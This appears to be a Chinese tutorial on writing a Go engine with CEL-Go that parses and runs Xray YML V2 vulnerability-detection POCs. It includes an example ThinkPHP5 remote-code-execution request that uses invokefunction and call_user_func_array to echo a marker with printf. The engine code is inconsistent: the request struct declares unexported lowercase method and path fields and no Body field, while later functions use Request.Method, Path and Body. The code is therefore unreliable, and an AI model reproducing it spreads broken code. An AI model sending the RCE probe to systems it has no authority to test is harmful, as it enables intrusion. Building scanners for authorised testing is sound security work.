利用CEL-Go执行Xray YML V2 POC学习指南<\/h1>

1. Xray YML V2 POC概述<\/h2>
Xray的YML POC从V1升级到V2版本后，执行流程有了显著变化。主要区别在于：<\/p>
新增了transport<\/code>字段：取值范围为tcp、udp、http，使Xray能够探测TCP协议的漏洞<\/li>
新增了expression<\/code>字段：改变了V1 POC的执行流程，可利用短路逻辑设计执行流程<\/li>
<\/ul>
V1与V2 POC示例对比<\/h3>
V1版本示例<\/strong>:<\/p>
name<\/span>: poc-yaml-thinkphp5-controller-rce<\/span>
<\/span><\/span>rules<\/span>:
<\/span><\/span>  - method<\/span>: GET<\/span>
<\/span><\/span>    path<\/span>: \/index.php?s=\/Index\/\think\app\/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91<\/span>
<\/span><\/span>    expression<\/span>: |
<\/span><\/span><\/span>      <\/span>      response.body.bcontains(b"a29hbHIgaXMg%d2F0Y2hpbmcgeW9129")<\/span>
<\/span><\/span>detail<\/span>:
<\/span><\/span>  links<\/span>:
<\/span><\/span>    - https:\/\/github.com\/vulhub\/vulhub\/tree\/master\/thinkphp\/5-rce<\/span>
<\/span><\/span><\/code><\/pre>V2版本示例<\/strong>:<\/p>
name<\/span>: poc-yaml-thinkphp5-controller-rce<\/span>
<\/span><\/span>manual<\/span>: true<\/span>
<\/span><\/span>transport<\/span>: http<\/span>
<\/span><\/span>rules<\/span>:
<\/span><\/span>    r0<\/span>:
<\/span><\/span>        request<\/span>:
<\/span><\/span>            cache<\/span>: true<\/span>
<\/span><\/span>            method<\/span>: GET<\/span>
<\/span><\/span>            path<\/span>: \/index.php?s=\/Index\/\think\app\/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91<\/span>
<\/span><\/span>        expression<\/span>: response.body.bcontains(b"a29hbHIgaXMg%d2F0Y2hpbmcgeW9129")<\/span>
<\/span><\/span>expression<\/span>: r0()<\/span>
<\/span><\/span>detail<\/span>:
<\/span><\/span>    links<\/span>:
<\/span><\/span>        - https:\/\/github.com\/vulhub\/vulhub\/tree\/master\/thinkphp\/5-rce<\/span>
<\/span><\/span><\/code><\/pre>2. 实现YML POC执行引擎<\/h2>
2.1 反序列化YML文件<\/h3>
首先需要定义POC结构体并将YML文件反序列化：<\/p>
type<\/span> Poc<\/span> struct<\/span> {
<\/span><\/span>    Name<\/span>       string<\/span>            `yaml:"name"`<\/span>
<\/span><\/span>    Transport<\/span>  string<\/span>            `yaml:"transport"`<\/span>
<\/span><\/span>    Set<\/span>        map<\/span>[string<\/span>]string<\/span> `yaml:"set"`<\/span>
<\/span><\/span>    Rules<\/span>      map<\/span>[string<\/span>]Rule<\/span>   `yaml:"rules"`<\/span>
<\/span><\/span>    Expression<\/span> string<\/span>            `yaml:"expression"`<\/span>
<\/span><\/span>    Detail<\/span>     Detail<\/span>            `yaml:"detail"`<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>type<\/span> Rule<\/span> struct<\/span> {
<\/span><\/span>    Request<\/span>    RuleRequest<\/span> `yaml:"request"`<\/span>
<\/span><\/span>    Expression<\/span> string<\/span>      `yaml:"expression"`<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>type<\/span> RuleRequest<\/span> struct<\/span> {
<\/span><\/span>    Cache<\/span>      bool<\/span>   `yaml:"cache"`<\/span>
<\/span><\/span>    method<\/span>     string<\/span> `yaml:"method"`<\/span>
<\/span><\/span>    path<\/span>       string<\/span> `yaml:"path"`<\/span>
<\/span><\/span>    Expression<\/span> string<\/span> `yaml:"expression"`<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>type<\/span> Detail<\/span> struct<\/span> {
<\/span><\/span>    Links<\/span> []string<\/span> `yaml:"links"`<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>func<\/span> main<\/span>() {
<\/span><\/span>    poc<\/span> :=<\/span> Poc<\/span>{}
<\/span><\/span>    pocFile<\/span>, _<\/span> :=<\/span> ioutil<\/span>.ReadFile<\/span>("poc.yml"<\/span>)
<\/span><\/span>    err<\/span> :=<\/span> yaml<\/span>.Unmarshal<\/span>(pocFile<\/span>,&<\/span>poc<\/span>)
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span>{
<\/span><\/span>        println(err<\/span>.Error<\/span>())
<\/span><\/span>    }
<\/span><\/span>    println(pocFile<\/span>)
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.2 处理set全局变量<\/h3>
定义函数处理set表达式并执行：<\/p>
func<\/span> execSetExpression<\/span>(Expression<\/span> string<\/span>) (interface<\/span>{}, error<\/span>) {
<\/span><\/span>    \/\/ 定义set内部函数接口
<\/span><\/span><\/span><\/span>    setFuncsInterface<\/span> :=<\/span> cel<\/span>.Declarations<\/span>(
<\/span><\/span>        decls<\/span>.NewFunction<\/span>("randomInt"<\/span>,
<\/span><\/span>            decls<\/span>.NewOverload<\/span>("randomInt_int_int"<\/span>,
<\/span><\/span>                []*<\/span>exprpb<\/span>.Type<\/span>{decls<\/span>.Int<\/span>, decls<\/span>.Int<\/span>},
<\/span><\/span>                decls<\/span>.String<\/span>)),
<\/span><\/span>        decls<\/span>.NewFunction<\/span>("randomLowercase"<\/span>,
<\/span><\/span>            decls<\/span>.NewOverload<\/span>("randomLowercase_string"<\/span>,
<\/span><\/span>                []*<\/span>exprpb<\/span>.Type<\/span>{decls<\/span>.Int<\/span>},
<\/span><\/span>                decls<\/span>.String<\/span>)),
<\/span><\/span>    )
<\/span><\/span>
<\/span><\/span>    \/\/ 实现set内部函数接口
<\/span><\/span><\/span><\/span>    setFuncsImpl<\/span> :=<\/span> cel<\/span>.Functions<\/span>(
<\/span><\/span>        &<\/span>functions<\/span>.Overload<\/span>{
<\/span><\/span>            Operator<\/span>: "randomInt_int_int"<\/span>,
<\/span><\/span>            Binary<\/span>: func<\/span>(lhs<\/span> ref<\/span>.Val<\/span>, rhs<\/span> ref<\/span>.Val<\/span>) ref<\/span>.Val<\/span> {
<\/span><\/span>                randSource<\/span> :=<\/span> rand<\/span>.New<\/span>(rand<\/span>.NewSource<\/span>(time<\/span>.Now<\/span>().UnixNano<\/span>()))
<\/span><\/span>                min<\/span> :=<\/span> int(lhs<\/span>.Value<\/span>().(int64<\/span>))
<\/span><\/span>                max<\/span> :=<\/span> int(rhs<\/span>.Value<\/span>().(int64<\/span>))
<\/span><\/span>                return<\/span> types<\/span>.String<\/span>(strconv<\/span>.Itoa<\/span>(min<\/span> +<\/span> randSource<\/span>.Intn<\/span>(max<\/span>-<\/span>min<\/span>)))
<\/span><\/span>            }},
<\/span><\/span>        &<\/span>functions<\/span>.Overload<\/span>{
<\/span><\/span>            Operator<\/span>: "randomLowercase_string"<\/span>,
<\/span><\/span>            Unary<\/span>: func<\/span>(lhs<\/span> ref<\/span>.Val<\/span>) ref<\/span>.Val<\/span> {
<\/span><\/span>                n<\/span> :=<\/span> lhs<\/span>.Value<\/span>().(int64<\/span>)
<\/span><\/span>                letterBytes<\/span> :=<\/span> "abcdefghijklmnopqrstuvwxyz"<\/span>
<\/span><\/span>                randSource<\/span> :=<\/span> rand<\/span>.New<\/span>(rand<\/span>.NewSource<\/span>(time<\/span>.Now<\/span>().UnixNano<\/span>()))
<\/span><\/span>                const<\/span> (
<\/span><\/span>                    letterIdxBits<\/span> = 6<\/span>
<\/span><\/span>                    letterIdxMask<\/span> = 1<\/span><<<\/span>letterIdxBits<\/span> -<\/span> 1<\/span>
<\/span><\/span>                    letterIdxMax<\/span>  = 63<\/span> \/<\/span> letterIdxBits<\/span>
<\/span><\/span>                )
<\/span><\/span>                randBytes<\/span> :=<\/span> make([]byte<\/span>, n<\/span>)
<\/span><\/span>                for<\/span> i<\/span>, cache<\/span>, remain<\/span> :=<\/span> n<\/span>-<\/span>1<\/span>, randSource<\/span>.Int63<\/span>(), letterIdxMax<\/span>; i<\/span> >=<\/span> 0<\/span>; {
<\/span><\/span>                    if<\/span> remain<\/span> ==<\/span> 0<\/span> {
<\/span><\/span>                        cache<\/span>, remain<\/span> = randSource<\/span>.Int63<\/span>(), letterIdxMax<\/span>
<\/span><\/span>                    }
<\/span><\/span>                    if<\/span> idx<\/span> :=<\/span> int(cache<\/span> &<\/span> letterIdxMask<\/span>); idx<\/span> < len(letterBytes<\/span>) {
<\/span><\/span>                        randBytes<\/span>[i<\/span>] = letterBytes<\/span>[idx<\/span>]
<\/span><\/span>                        i<\/span>--<\/span>
<\/span><\/span>                    }
<\/span><\/span>                    cache<\/span> >>=<\/span> letterIdxBits<\/span>
<\/span><\/span>                    remain<\/span>--<\/span>
<\/span><\/span>                }
<\/span><\/span>                return<\/span> types<\/span>.String<\/span>(randBytes<\/span>)
<\/span><\/span>            }},
<\/span><\/span>    )
<\/span><\/span>
<\/span><\/span>    \/\/ 创建set执行环境
<\/span><\/span><\/span><\/span>    env<\/span>, err<\/span> :=<\/span> cel<\/span>.NewEnv<\/span>(setFuncsInterface<\/span>)
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        log<\/span>.Fatalf<\/span>("environment creation error: %v\n"<\/span>, err<\/span>)
<\/span><\/span>    }
<\/span><\/span>    ast<\/span>, iss<\/span> :=<\/span> env<\/span>.Compile<\/span>(Expression<\/span>)
<\/span><\/span>    if<\/span> iss<\/span>.Err<\/span>() !=<\/span> nil<\/span> {
<\/span><\/span>        log<\/span>.Fatalln<\/span>(iss<\/span>.Err<\/span>())
<\/span><\/span>        return<\/span> nil<\/span>, iss<\/span>.Err<\/span>()
<\/span><\/span>    }
<\/span><\/span>    prg<\/span>, err<\/span> :=<\/span> env<\/span>.Program<\/span>(ast<\/span>, setFuncsImpl<\/span>)
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        return<\/span> nil<\/span>, errors<\/span>.New<\/span>(fmt<\/span>.Sprintf<\/span>("Program creation error: %v\n"<\/span>, err<\/span>))
<\/span><\/span>    }
<\/span><\/span>    out<\/span>, _<\/span>, err<\/span> :=<\/span> prg<\/span>.Eval<\/span>(map<\/span>[string<\/span>]interface<\/span>{}{})
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        log<\/span>.Fatalf<\/span>("Evaluation error: %v\n"<\/span>, err<\/span>)
<\/span><\/span>        return<\/span> nil<\/span>, errors<\/span>.New<\/span>(fmt<\/span>.Sprintf<\/span>("Evaluation error: %v\n"<\/span>, err<\/span>))
<\/span><\/span>    }
<\/span><\/span>    return<\/span> out<\/span>, nil<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.3 渲染函数处理变量<\/h3>
\/\/ 渲染函数 渲染变量到request中
<\/span><\/span><\/span><\/span>func<\/span> render<\/span>(v<\/span> string<\/span>, setMap<\/span> map<\/span>[string<\/span>]interface<\/span>{}) string<\/span> {
<\/span><\/span>    for<\/span> k1<\/span>, v1<\/span> :=<\/span> range<\/span> setMap<\/span> {
<\/span><\/span>        _<\/span>, isMap<\/span> :=<\/span> v1<\/span>.(map<\/span>[string<\/span>]string<\/span>)
<\/span><\/span>        if<\/span> isMap<\/span> {
<\/span><\/span>            continue<\/span>
<\/span><\/span>        }
<\/span><\/span>        v1Value<\/span> :=<\/span> fmt<\/span>.Sprintf<\/span>("%v"<\/span>, v1<\/span>)
<\/span><\/span>        t<\/span> :=<\/span> "{{"<\/span> +<\/span> k1<\/span> +<\/span> "}}"<\/span>
<\/span><\/span>        if<\/span> !strings<\/span>.Contains<\/span>(v<\/span>, t<\/span>) {
<\/span><\/span>            continue<\/span>
<\/span><\/span>        }
<\/span><\/span>        v<\/span> = strings<\/span>.ReplaceAll<\/span>(v<\/span>, t<\/span>, v1Value<\/span>)
<\/span><\/span>    }
<\/span><\/span>    return<\/span> v<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.4 定义Response结构体<\/h3>
使用protobuf定义Response结构体：<\/p>
syntax =<\/span> "proto3"<\/span>;
<\/span><\/span><\/span><\/span>option<\/span> go_package =<\/span> ".\/;structs"<\/span>;
<\/span><\/span><\/span><\/span>package<\/span> structs;
<\/span><\/span><\/span>
<\/span><\/span><\/span><\/span>message<\/span> Response<\/span> {
<\/span><\/span><\/span><\/span>  bytes<\/span> body =<\/span> 1<\/span>;
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/span><\/code><\/pre>生成Go文件：<\/p>
protoc -I . --go_out=<\/span>. requests.proto
<\/span><\/span><\/code><\/pre>2.5 执行单条rule表达式<\/h3>
func<\/span> execRuleExpression<\/span>(Expression<\/span> string<\/span>, variableMap<\/span> map<\/span>[string<\/span>]interface<\/span>{}) bool<\/span> {
<\/span><\/span>   env<\/span>, _<\/span> :=<\/span> cel<\/span>.NewEnv<\/span>(
<\/span><\/span>      cel<\/span>.Container<\/span>("structs"<\/span>),
<\/span><\/span>      cel<\/span>.Types<\/span>(&<\/span>structs<\/span>.Response<\/span>{}),
<\/span><\/span>      cel<\/span>.Declarations<\/span>(
<\/span><\/span>         decls<\/span>.NewVar<\/span>("response"<\/span>, decls<\/span>.NewObjectType<\/span>("structs.Response"<\/span>)),
<\/span><\/span>         decls<\/span>.NewFunction<\/span>("bcontains"<\/span>,
<\/span><\/span>            decls<\/span>.NewInstanceOverload<\/span>("bytes_bcontains_bytes"<\/span>,
<\/span><\/span>               []*<\/span>exprpb<\/span>.Type<\/span>{decls<\/span>.Bytes<\/span>, decls<\/span>.Bytes<\/span>},
<\/span><\/span>               decls<\/span>.Bool<\/span>)),
<\/span><\/span>      ),
<\/span><\/span>   )
<\/span><\/span>   funcImpl<\/span> :=<\/span> []cel<\/span>.ProgramOption<\/span>{
<\/span><\/span>      cel<\/span>.Functions<\/span>(
<\/span><\/span>         &<\/span>functions<\/span>.Overload<\/span>{
<\/span><\/span>            Operator<\/span>: "bytes_bcontains_bytes"<\/span>,
<\/span><\/span>            Binary<\/span>: func<\/span>(lhs<\/span> ref<\/span>.Val<\/span>, rhs<\/span> ref<\/span>.Val<\/span>) ref<\/span>.Val<\/span> {
<\/span><\/span>               v1<\/span>, ok<\/span> :=<\/span> lhs<\/span>.(types<\/span>.Bytes<\/span>)
<\/span><\/span>               if<\/span> !ok<\/span> {
<\/span><\/span>                  return<\/span> types<\/span>.ValOrErr<\/span>(lhs<\/span>, "unexpected type '%v' passed to bcontains"<\/span>, lhs<\/span>.Type<\/span>())
<\/span><\/span>               }
<\/span><\/span>               v2<\/span>, ok<\/span> :=<\/span> rhs<\/span>.(types<\/span>.Bytes<\/span>)
<\/span><\/span>               if<\/span> !ok<\/span> {
<\/span><\/span>                  return<\/span> types<\/span>.ValOrErr<\/span>(rhs<\/span>, "unexpected type '%v' passed to bcontains"<\/span>, rhs<\/span>.Type<\/span>())
<\/span><\/span>               }
<\/span><\/span>               return<\/span> types<\/span>.Bool<\/span>(bytes<\/span>.Contains<\/span>(v1<\/span>, v2<\/span>))
<\/span><\/span>            },
<\/span><\/span>         },
<\/span><\/span>      )}
<\/span><\/span>   ast<\/span>, iss<\/span> :=<\/span> env<\/span>.Compile<\/span>(Expression<\/span>)
<\/span><\/span>   if<\/span> iss<\/span>.Err<\/span>() !=<\/span> nil<\/span> {
<\/span><\/span>      log<\/span>.Fatalln<\/span>(iss<\/span>.Err<\/span>())
<\/span><\/span>   }
<\/span><\/span>   prg<\/span>, err<\/span> :=<\/span> env<\/span>.Program<\/span>(ast<\/span>, funcImpl<\/span>...<\/span>)
<\/span><\/span>   if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>      log<\/span>.Fatalf<\/span>("Program creation error: %v\n"<\/span>, err<\/span>)
<\/span><\/span>   }
<\/span><\/span>   out<\/span>, _<\/span>, err<\/span> :=<\/span> prg<\/span>.Eval<\/span>(variableMap<\/span>)
<\/span><\/span>   if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>      log<\/span>.Fatalf<\/span>("Evaluation error: %v\n"<\/span>, err<\/span>)
<\/span><\/span>   }
<\/span><\/span>   return<\/span> out<\/span>.Value<\/span>().(bool<\/span>)
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.6 请求处理匿名函数<\/h3>
var<\/span> RequestsInvoke<\/span> = func<\/span>(target<\/span> string<\/span>, setMap<\/span> map<\/span>[string<\/span>]interface<\/span>{}, rule<\/span> Rule<\/span>) bool<\/span> {
<\/span><\/span>    var<\/span> req<\/span> *<\/span>http<\/span>.Request<\/span>
<\/span><\/span>    var<\/span> err<\/span> error<\/span>
<\/span><\/span>    if<\/span> rule<\/span>.Request<\/span>.Body<\/span> ==<\/span> ""<\/span> {
<\/span><\/span>        req<\/span>, err<\/span> = http<\/span>.NewRequest<\/span>(rule<\/span>.Request<\/span>.Method<\/span>, target<\/span>+<\/span>render<\/span>(rule<\/span>.Request<\/span>.Path<\/span>, setMap<\/span>), nil<\/span>)
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        req<\/span>, err<\/span> = http<\/span>.NewRequest<\/span>(rule<\/span>.Request<\/span>.Method<\/span>, target<\/span>+<\/span>render<\/span>(rule<\/span>.Request<\/span>.Path<\/span>, setMap<\/span>), bytes<\/span>.NewBufferString<\/span>(render<\/span>(rule<\/span>.Request<\/span>.Body<\/span>, setMap<\/span>)))
<\/span><\/span>    }
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        log<\/span>.Println<\/span>(fmt<\/span>.Sprintf<\/span>("http request error: %s"<\/span>, err<\/span>.Error<\/span>()))
<\/span><\/span>        return<\/span> false<\/span>
<\/span><\/span>    }
<\/span><\/span>    resp<\/span>, err<\/span> :=<\/span> http<\/span>.DefaultClient<\/span>.Do<\/span>(req<\/span>)
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        println(err<\/span>.Error<\/span>())
<\/span><\/span>        return<\/span> false<\/span>
<\/span><\/span>    }
<\/span><\/span>    response<\/span> :=<\/span> &<\/span>structs<\/span>.Response<\/span>{}
<\/span><\/span>    response<\/span>.Body<\/span>, _<\/span> = ioutil<\/span>.ReadAll<\/span>(resp<\/span>.Body<\/span>)
<\/span><\/span>    return<\/span> execRuleExpression<\/span>(rule<\/span>.Expression<\/span>, map<\/span>[string<\/span>]interface<\/span>{}{"response"<\/span>: response<\/span>})
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.7 执行POC Expression<\/h3>
func<\/span> execPocExpression<\/span>(target<\/span> string<\/span>, setMap<\/span> map<\/span>[string<\/span>]interface<\/span>{}, Expression<\/span> string<\/span>, rules<\/span> map<\/span>[string<\/span>]Rule<\/span>) bool<\/span> {
<\/span><\/span>   var<\/span> funcsInterface<\/span> []*<\/span>exprpb<\/span>.Decl<\/span>
<\/span><\/span>   var<\/span> funcsImpl<\/span> []*<\/span>functions<\/span>.Overload<\/span>
<\/span><\/span>   for<\/span> key<\/span>, rule<\/span> :=<\/span> range<\/span> rules<\/span> {
<\/span><\/span>      funcName<\/span> :=<\/span> key<\/span>
<\/span><\/span>      funcRule<\/span> :=<\/span> rule<\/span>
<\/span><\/span>      funcsInterface<\/span> = append(funcsInterface<\/span>, decls<\/span>.NewFunction<\/span>(key<\/span>, decls<\/span>.NewOverload<\/span>(key<\/span>, []*<\/span>exprpb<\/span>.Type<\/span>{}, decls<\/span>.Bool<\/span>)))
<\/span><\/span>      funcsImpl<\/span> = append(funcsImpl<\/span>,
<\/span><\/span>         &<\/span>functions<\/span>.Overload<\/span>{
<\/span><\/span>            Operator<\/span>: funcName<\/span>,
<\/span><\/span>            Function<\/span>: func<\/span>(values<\/span> ...<\/span>ref<\/span>.Val<\/span>) ref<\/span>.Val<\/span> {
<\/span><\/span>               return<\/span> types<\/span>.Bool<\/span>(RequestsInvoke<\/span>(target<\/span>, setMap<\/span>, funcRule<\/span>))
<\/span><\/span>            },
<\/span><\/span>         })
<\/span><\/span>   }
<\/span><\/span>   env<\/span>, err<\/span> :=<\/span> cel<\/span>.NewEnv<\/span>(cel<\/span>.Declarations<\/span>(funcsInterface<\/span>...<\/span>))
<\/span><\/span>   if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>      log<\/span>.Fatalf<\/span>("environment creation error: %v\n"<\/span>, err<\/span>)
<\/span><\/span>   }
<\/span><\/span>   ast<\/span>, iss<\/span> :=<\/span> env<\/span>.Compile<\/span>(Expression<\/span>)
<\/span><\/span>   if<\/span> iss<\/span>.Err<\/span>() !=<\/span> nil<\/span> {
<\/span><\/span>      log<\/span>.Fatalln<\/span>(iss<\/span>.Err<\/span>())
<\/span><\/span>   }
<\/span><\/span>   prg<\/span>, err<\/span> :=<\/span> env<\/span>.Program<\/span>(ast<\/span>, cel<\/span>.Functions<\/span>(funcsImpl<\/span>...<\/span>))
<\/span><\/span>   if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>      log<\/span>.Fatalln<\/span>(fmt<\/span>.Sprintf<\/span>("Program creation error: %v\n"<\/span>, err<\/span>))
<\/span><\/span>   }
<\/span><\/span>   out<\/span>, _<\/span>, err<\/span> :=<\/span> prg<\/span>.Eval<\/span>(map<\/span>[string<\/span>]interface<\/span>{}{})
<\/span><\/span>   return<\/span> out<\/span>.Value<\/span>().(bool<\/span>)
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. 参考资源<\/h2>

CEL-Go官方示例<\/a><\/li>
CEL-Go Codelab教程<\/a><\/li>
完整项目代码<\/a><\/li>
Xray官方文档<\/a><\/li>
<\/ol>
4. 关键点总结<\/h2>

CEL表达式执行<\/strong>：Xray V2 POC使用CEL表达式引擎实现灵活的逻辑判断<\/li>
变量渲染机制<\/strong>：通过{{variable}}<\/code>语法实现请求参数的动态生成<\/li>
短路逻辑设计<\/strong>：通过将规则定义为函数，在CEL表达式中实现短路执行<\/li>
类型系统集成<\/strong>：使用protobuf定义Response类型并与CEL类型系统集成<\/li>
扩展函数实现<\/strong>：通过实现自定义函数如bcontains<\/code>增强CEL表达能力<\/li>
<\/ol>
通过以上实现，可以构建一个完整的Xray V2 POC执行引擎，支持YML格式的漏洞检测规则解析和执行。<\/p>